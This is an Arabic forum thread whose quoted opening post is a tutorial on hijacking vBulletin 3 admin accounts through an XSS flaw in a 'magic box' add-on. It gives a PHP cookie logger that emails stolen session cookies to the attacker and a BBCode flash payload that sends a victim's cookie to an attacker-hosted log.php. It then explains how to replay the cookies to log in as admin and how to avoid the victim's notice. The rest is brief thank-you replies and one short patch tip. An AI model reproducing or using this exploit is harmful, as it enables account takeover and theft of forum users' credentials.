مرحبا ً بك على صفحاتنا ... يمكنك التسجيل بالضغط هنا

ملتقيات مياسه  
ماشاء الله تبارك الله ماشاء الله لاقوة الا بالله
فتيات   دليل   العاب   تحميل صور      sitemap   منتديات   الإعلانات   اتصل بالإدارة
المنتدى شبكة إدعس مركز تحميل مياسه
صور ، صورة ، منوعات ، صور اطفال ، صور كرتون دردشة ، شات ، دردشة كتابيه ، دردشة سعودية ينتهي بتاريخ : 06/10/2008
 

قوانين وضوابط المنتدى + شروط الاشراف

آخر 10 مشاركات
صحفي شــاب يصحح للأئمــة الأعــلام خطـأ ألـف عـام           »          جمال الروح           »          نغمة اذان السحيمي مؤذن مسجد قباء           »          باقة زيرو           »          شاهد بالفيديو عفو ملكي يصدر اثناء تنفيذ القصاص سبحان الله           »          مقاطع افلام هستره وضحك           »          ودي ابكـ‘ـي ليـ’ـن مايبقـ‘ـى دمـ’ـوع           »          محاولة اغتيال امام الحرم الشيخ السديس           »          هــدية العيد لكل الأعضــاء يالله تعالوا بلا دلع !!!!           »          هل سمعت أم كلثوم وهي تقرأ القرآن


العودة   ملتقيات مياسه > •][• ملتقيات عالم الانترنت والاتصالات •][• > •°•¤ اللدغه السامه¤•°• > اختراق المواقع والمنتديات

اختراق المواقع والمنتديات يتم وضع جميع طرق اختراق المواقع والمنتديات والثغرات الجديده وطرق اغلاقها والحمايه منها


شرح اختراق المنتدياتvb3 بإحدى ثغرات الصندوق السحري والماسي<< تم ترقيع مياسه

اختراق المواقع والمنتديات


إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
 عرض البوم صور hiwan    مشاركة رقم : 31  
قديم في 10-Mar-2008 الساعة : 07:59 PM
عضو مياسي
hiwan غير متواجد حالياً

رقم العضوية : 75599
تاريخ التسجيل : Oct 2007
المشاركات : 9
بمعدل : 0.03 يوميا
معدل تقييم المستوى : 0
المستوى : hiwan is on a distinguished road
رد: شرح اختراق المنتدياتvb3 بإحدى ثغرات الصندوق السحري والماسي<< تم ترقيع مياسه
thanx
okkkkkkkkkkkkkkkkkk
من مواضيع : hiwan 0 لان...حمل برنامج الفوتوشوب فى اقل من عشر دقائق ^_^
0 فااااااااااااااااااااااااااااااااااشلين -هعهعهعهعهعهعهع-
 عرض البوم صور ahmed611    مشاركة رقم : 32  
قديم في 11-Mar-2008 الساعة : 10:12 AM
عضو مياسي
ahmed611 غير متواجد حالياً

رقم العضوية : 93342
تاريخ التسجيل : Mar 2008
المشاركات : 1
بمعدل : 0.00 يوميا
معدل تقييم المستوى : 0
المستوى : ahmed611 is on a distinguished road
رد: شرح اختراق المنتدياتvb3 بإحدى ثغرات الصندوق السحري والماسي<< تم ترقيع مياسه
مشكووووووووووووووووووووووووووووووووووووووووور
من مواضيع : ahmed611
 عرض البوم صور تامر احمد محمد    مشاركة رقم : 33  
قديم في 20-Mar-2008 الساعة : 05:19 AM
عضو مياسي
تامر احمد محمد غير متواجد حالياً

رقم العضوية : 94626
تاريخ التسجيل : Mar 2008
المشاركات : 3
بمعدل : 0.01 يوميا
معدل تقييم المستوى : 0
المستوى : تامر احمد محمد is on a distinguished road
شكرا بس انا ما فهمت شئ
اقتباس:
المشاركة الأصلية كتبت بواسطة كويتي^صخر مشاهدة المشاركة
[msg]ارجوا عدم استعمال الثغره على اخوانك العرب ...[/msg]بسم الله الرحمن الرحيم

والصلاة والسلام على أشرف خــلق الله
سيدنا وحبيبنا محمد وعلى آله وصحبه أجمعين..
وبعد...

بمناسبه عيد الفطر السعيد
وعودتي على اعضاء منتديات مياسه

يشرفني بأني اشرح اقوى ثغرات المنتديات
من نوع فيبولتين vb المعروفه والجميله جدا
ويتميز هذا النوع من المنتديات بسهوله استعماله
وكثرت الهاكات التي تركب به الجميله جدا

ومن اجمل الهاكات هو الصندوق السحري و الماسي
ولكن مافي شئ كـامل الا الله سبحان وتعالى

وفي هذا النصدوق السحري يوجد ثلاث ثغرات
وهم:- ثغره الفلاش ثغره الريل بلاير ثغره تنسيق القصيده
وهي من اكتشاف اخونا العزيز: العنــدليب

وهم من نوع xss

نبدأ الشرح
ولكـن قبـل لا ابدأ الشرح
يــاليت تقرأ هذه العباره:-

" أقســم باللــه أني ما أستخدم الثغره على المنتديات العربيه
والاسلاميه"

اللهم قد بلغت اللهم فشهد
اللهم قد بلغت اللهم فشهد
اللهم قد بلغت اللهم فشهد

بسم الله نبدأ

مذا تحتاج الثغره:-

لوجو مبرمج بلغه الـ php
واخوانا ديفل مبرمج php
ماقصر سوالنا لوج قوي جدا

كود PHP:
<?php
/* S4aLog v1.0 [ Beta ]
-----------------------
**Beta Of S4aLog v1.0 With Str_Repalce <;>
! You Can Get ******* And Refresh The Broweser ! v0.10
[ New New New ]
!Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=******* 
[ MSG ]
Name : Attack1
******* : *******
Refresh : http://www.s4a.xx
[ MSG ]!
!
Get ******* Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121;
!
[ New New New ]
*/
$YourMail "(تم حذف الإيميل لأن عرضه مخالف لشروط المنتدى)";  // Your E-mail
/*-----------------------*/
$Ip $REMOTE_ADDR;
$Cooki_e $_GET['id'];
$NameOfAttack $_GET['nm'];
$Refresh $_GET['re'];
/* Start */
$Replace******= array("=",";");
$Replace******= array("[ "," ]  ");
$Cooki_e str_replace($Replace******1,$Replace******2,$Cooki_e); // Replace
/* e.x hash=0210; | hash[0210]*/
//***************************************//
$Hdr "From: S4aLog <log-(تم حذف الإيميل لأن عرضه مخالف لشروط المنتدى)>";
$Msg =
"
Mr Attacker ;) ,,, S4aLog v1 Beta <<
[ "
.$NameOfAttack." ] ,, Name Of Attack
[ "
.$Refresh." ] ,, Refresh Page
[ "
.$Ip." ] ,, Ip
[ S4aLog < By Devil-00 > -- Thnx For -- <System Evil> <xxx (hacker)> <s4a Members> ]
[ (تم حذف الإيميل لأن عرضه مخالف لشروط المنتدى) - (تم حذف الإيميل لأن عرضه مخالف لشروط المنتدى) ]
-----------------------------------------------
****** ::
"
.$Cooki_e."
"
;
/* ------------------------------------------------------------------------- */
$Send mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);
/**************************************************    ***************************/
if($Send){
if(
$Refresh <> ""){header("location:".$Refresh);}
}
?>
اعمل التغييرات الاتيه:-

YourMail = "(تم حذف الإيميل لأن عرضه مخالف لشروط المنتدى)"; // Your E-mail

وضع اميلك بداله

والتغيير الثاني هو
كلمه
C o o k i e
وهي تخرج على هيئئه 6 نجوم
******
غيرها
وضع كلمه
C o o k i e
ولكن ازل المسافات بين الاحرف
لكي تكون كلمه واحده بدون مسافات

لكي يكتمل اللوج عندنا

وبعد التعديل اعمل على المفكره عندما تنسخ كود اللوج
واحفظه بأسم log
وغير الامتداد الى php

وارفع اللوج على موقعك الشخصي
او اي موقع يقبل php

والحين نجرب مع بعض على طريقه استغلال الثغره
وراج اجرب على ثغره الفلاش لانها الاسهل
على المبتدئين

هذا كود الثغره

كود PHP:
[flash=http://www.xxxxxx.com/test.swf]onmouseover='alert(****************);'[/flash] 
والان نأتي بربط كود الثغره بملف فلاشي
لكي نخدع به صاحب المنتدى او اي مشرف من المشرفين

والربط بيكون على الشكل التالي:-

كود PHP:
[flash=http://www.xxxx.com/card/x/swf/n.swf]onmouseover='location.href="http://www.xxx.com/log.php?nm=al-battar.net&re=http://www.xxxx.com/vb/showthread.php?t=1245&id="+****************'[/flash 
والحين يا شطار ندخل في المتغيرات:_

اولاً:-
http://www.xxxxxx.com/test.swf
نغيره الى اي ملف فلاشي
وينصح بملف صغير الحجم
لكي لا تنكشف ويتخرب شغلك

ثانياً:-
www.xxx.com/log.php
هنا غير الرابط هذا
برابط اللوج الذي رفعته على موقعك

بعد عمليه التعديل

ثالثاً:-
http://www.xxx.com/vb/showthread.php?t=1245


هذا ياشباب مهم يعني مثلا اى واحد يمر المآوس قدام الفلاش راح يودييه للصفحه الموجوده بالكود
وانا انصحك تحط يرجع لنفس الصفحه الموجود فيها الفلاش عشان لا يشك الضحيه
ونشكر اخونا ديفيل لان طور اللوجو لان اول لوجو لامريت المآوس يوديك لصفحه بيضه

يعني نغير الرابط هذا
الى اي رابط موضوع
وينصح برابط الموضوع نفسه

وجزاه الله خير دع الخياار لناااا الله يوفقه في الوجو الجديد ( المطور )


ملإحظه ( إكيد بعضكم يبي يقول شلؤن اعرف انه هذا الكوكيز لاى منتدى )

اجابة السؤال ( الخيآر الثالث بالكوكيز وهى الصفحه المراد الذهاب لها بعد مررو مآوس الضحيه امام الفلاش

راح تجيك داخل الرساله وجذى تعرف لاى منتدى هذا الكوكيز )

الحين هذى شكل الرساله اللى راح توصلك ( بهذا الشكل )

****** ::
bbsessionhash[ 6b0edfdfsfd3ffbe27bc928936aba42f3523efa ] bblastvisit[ 1119817asd013 ]
bblastactivity[ 11198as17959 ] bbforum_view[
3523e417e8fb0bc834d2abaf8f9eb54cax1x-ix2yix1119817237y_ ] bbthread_lastview[
cf56fed12e97ac29c33812245fe8e28aax1x-ix1985ysx10x\"1111907592\"y_ ] bbuserid[
6224 ] bbpassword[ 9360b6686129d3d676df4e6974e8f730


المهم بالرساله كله التالى

bbpassword
bbuserid
bblastactivity
bblastvisit

واكيد لازم تكون مسجل بالمنتدى اللى ودك تدخل بنك الادمن فيه

الحين نطلع اللى نبيه من الكوكيز اللى وصل لنا بالإيميل

الباسوورد المشفر
bbpassword
9360b6686129d3d676df4e6974e8f730

رقم العضويه
bbuserid
1

bblastactivity
1119817959

bblastvisit
1119817013

الآن إفتح برنامج الكوكيز

واللى ماعنده يحمله من هالراابط

من هنا

والان بعد ما استهدفنا الادمن الي نبي ندش بعضويته
وصلنا معلومات الكوكيز على الاميل

شوف الصوره



وبعد ما حملنا البرنامج محرر الكوكيز
نفتح ونغير المعلومات الي معلومات
التي وصلتلنا على الاميل





ملاحظه ( bb مو بكل المنتديات تبدآ بكل كلمه مثلا منتديات تبدآ بـ rr شيء عـآدى )

والآن بعد التعديل إغلق البرنامج واذهب للمتصفح واذهب للمنتدى سوف ترى انك

اصبحت ادمن كماا بالصوووره


تمت التجربه على عده منتدياات بنجااااح

والثغره لازالت شغاله واستغلالهاا سهل مثل ماتشووفوون

الترقيع

كلمة C o o k i e مع مراعات حذف المسافات بين الحروف اجعلها من ظمن الكلمات الممنوعة طبعا لاتنسى التفعيل وخلاص الحين تقفلت الثغرة

ولكم خالص تحيه

لا تـنسونا بالدعــاء

وانتظروا الجديد دائما على منتديات مياسه
والافضل بإذن الله قريب

والثغره إهذاء الى الاخ سكادا
وصقر البوادي
ومشرفين مياسه والاداريين واعضائها

وتم اغلاق هذه الثغره من منتديات مياسه
ولله الحمد
واي شئ تطور ابلغكم انشالله
تقبلو تحياتي

اخوكم:-
مــاجد
شكرا بس انا ما فهمت شئ
من مواضيع : تامر احمد محمد
 عرض البوم صور تامر احمد محمد    مشاركة رقم : 34  
قديم في 20-Mar-2008 الساعة : 05:20 AM
عضو مياسي
تامر احمد محمد غير متواجد حالياً

رقم العضوية : 94626
تاريخ التسجيل : Mar 2008
المشاركات : 3
بمعدل : 0.01 يوميا
معدل تقييم المستوى : 0
المستوى : تامر احمد محمد is on a distinguished road
رد: شرح اختراق المنتدياتvb3 بإحدى ثغرات الصندوق السحري والماسي<< تم ترقيع مياسه
اريد افهم اكتر وما فى صور ضاهرة اخوك تامر
من مواضيع : تامر احمد محمد
 عرض البوم صور تامر احمد محمد    مشاركة رقم : 35  
قديم في 20-Mar-2008 الساعة : 05:24 AM
عضو مياسي
تامر احمد محمد غير متواجد حالياً

رقم العضوية : 94626
تاريخ التسجيل : Mar 2008
المشاركات : 3
بمعدل : 0.01 يوميا
معدل تقييم المستوى : 0
المستوى : تامر احمد محمد is on a distinguished road
رد: شرح اختراق المنتدياتvb3 بإحدى ثغرات الصندوق السحري والماسي<< تم ترقيع مياسه
شكرا اخوى بس انا ما فهمت سئ وتسلم انى انت تعبت نفسك على هزا الكلام
من مواضيع : تامر احمد محمد
 عرض البوم صور بسآمـ    مشاركة رقم : 36  
قديم في 09-Apr-2008 الساعة : 03:29 AM
عضو مياسي
بسآمـ غير متواجد حالياً

رقم العضوية : 96338
تاريخ التسجيل : Mar 2008
المشاركات : 6
بمعدل : 0.03 يوميا
معدل تقييم المستوى : 0
المستوى : بسآمـ is on a distinguished road
رد: شرح اختراق المنتدياتvb3 بإحدى ثغرات الصندوق السحري والماسي<< تم ترقيع مياسه
يعطيك العآفيه
من مواضيع : بسآمـ
 عرض البوم صور ملك الجحيم    مشاركة رقم : 37  
قديم في 17-Apr-2008 الساعة : 08:19 PM
عضو مياسي
ملك الجحيم غير متواجد حالياً

رقم العضوية : 99040
تاريخ التسجيل : Apr 2008
المشاركات : 4
بمعدل : 0.02 يوميا
معدل تقييم المستوى : 0
المستوى : ملك الجحيم is on a distinguished road
رد: شرح اختراق المنتدياتvb3 بإحدى ثغرات الصندوق السحري والماسي<< تم ترقيع مياسه
مشكوووووووووووور وايد
من مواضيع : ملك الجحيم
 عرض البوم صور Ahmedjericho    مشاركة رقم : 38  
قديم في 19-Apr-2008 الساعة : 12:59 AM
عضو مياسي
Ahmedjericho غير متواجد حالياً

رقم العضوية : 99272
تاريخ التسجيل : Apr 2008
المشاركات : 2
بمعدل : 0.01 يوميا
معدل تقييم المستوى : 0
المستوى : Ahmedjericho is on a distinguished road
رد: شرح اختراق المنتدياتvb3 بإحدى ثغرات الصندوق السحري والماسي<< تم ترقيع مياسه
thxxxxxxxxxxx
من مواضيع : Ahmedjericho
 عرض البوم صور الهكر الجزائري    مشاركة رقم : 39  
قديم في 21-Apr-2008 الساعة : 11:03 PM
عضو مياسي
الهكر الجزائري غير متواجد حالياً

رقم العضوية : 99695
تاريخ التسجيل : Apr 2008
المشاركات : 3
بمعدل : 0.02 يوميا
معدل تقييم المستوى : 0
المستوى : الهكر الجزائري is on a distinguished road
رد: شرح اختراق المنتدياتvb3 بإحدى ثغرات الصندوق السحري والماسي<< تم ترقيع مياسه
تسلم اخوي سيستم ايفل على الشرح وعلى الثغره القويه
من مواضيع : الهكر الجزائري
 عرض البوم صور gx5    مشاركة رقم : 40  
قديم في 25-Apr-2008 الساعة : 02:45 AM
عضو مياسي
gx5 غير متواجد حالياً

رقم العضوية : 100216
تاريخ التسجيل : Apr 2008
المشاركات : 2
بمعدل : 0.01 يوميا
معدل تقييم المستوى : 0
المستوى : gx5 is on a distinguished road
رد: شرح اختراق المنتدياتvb3 بإحدى ثغرات الصندوق السحري والماسي<< تم ترقيع مياسه
مشكووووووووووووووووووووووور
من مواضيع : gx5
 عرض البوم صور kna111    مشاركة رقم : 41  
قديم في 11-May-2008 الساعة : 10:06 AM
عضو مياسي
kna111 غير متواجد حالياً

رقم العضوية : 102659
تاريخ التسجيل : May 2008
المشاركات : 1
بمعدل : 0.01 يوميا
معدل تقييم المستوى : 0
المستوى : kna111 is on a distinguished road
رد: شرح اختراق المنتدياتvb3 بإحدى ثغرات الصندوق السحري والماسي<< تم ترقيع مياسه
مشكووووووووووووووووووور
من مواضيع : kna111
 عرض البوم صور سيد الظلام    مشاركة رقم : 42  
قديم في 05-Sep-2008 الساعة : 03:21 PM
مزاجي:
الصورة الرمزية سيد الظلام

سيد الظلام غير متواجد حالياً

رقم العضوية : 46522
تاريخ التسجيل : Nov 2006
الدولة : جزيرة لا ترى النور
المشاركات : 13,024
بمعدل : 19.03 يوميا
معدل تقييم المستوى : 10
المستوى : سيد الظلام is on a distinguished road
إرسال رسالة عبر مراسل MSN إلى سيد الظلام إرسال رسالة عبر مراسل Yahoo إلى سيد الظلام
رد: شرح اختراق المنتدياتvb3 بإحدى ثغرات الصندوق السحري والماسي<< تم ترقيع مياسه

أشكرك جزيل الشكر على روعة ما نقلت

أستمتعت هنا كثيرا

تحيااااتي
من مواضيع : سيد الظلام 0 عراقي مستعد للموت من اجل عيون وزيرة خارجية اسرائيل
0 عمرو دياب: سأكتب قصة حياتي في كتاب!
0 ياسمين مع "المارينز" في شرم الشيخ
0 موسوعةالاخبار(( المثيرة والنادرة))متجددة كل يوم
0 نجوم أشتد بريقهم معنا فاستحقوا التميز/// ((أسماء مشرفي المنتديات الجدد))
إضافة رد



الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are متاحة

دردشة ، شات ، الوليد بن طلال ، حزينه ، قصيده ، تحميل ، prorat ،حلويات رمضان ، صور افلام الكرتون ، صور اطفال ، المكياج والتسريحات ، سوزان تميم ، لعبة فيفا ، ملحم زين ، خواطر حب ، جلابيات ، اهداف الهلال ، دراريع سهرة  اكسسوارات ، تحميل ، جلابيات ، جمس ، الحياة الزوجيه ، فتيات ، مجلة الجرس ، فيديو ، ارشيف ، امل العوضي ، شجون الهاجري ، باب الحارة ، سنوات الضياع ، نور ، باب الحارة ، مصارعة ، ملاكمة ، صور اطفال ، ببني وبينك gamezer ، مدونة ، شاعر المليون ، ناصر القطامي
مواقع صديقه لـ مياسه :  روحي تحبك ، برامج ، فنادق شرم الشيخ ، اناشيد  ، توبيكات

الساعة الآن 11:45 AM.


Powered by vBulletin® Version 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd diamond
جميع الحقوق محفوظه لـ ملتقيات مياسه

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49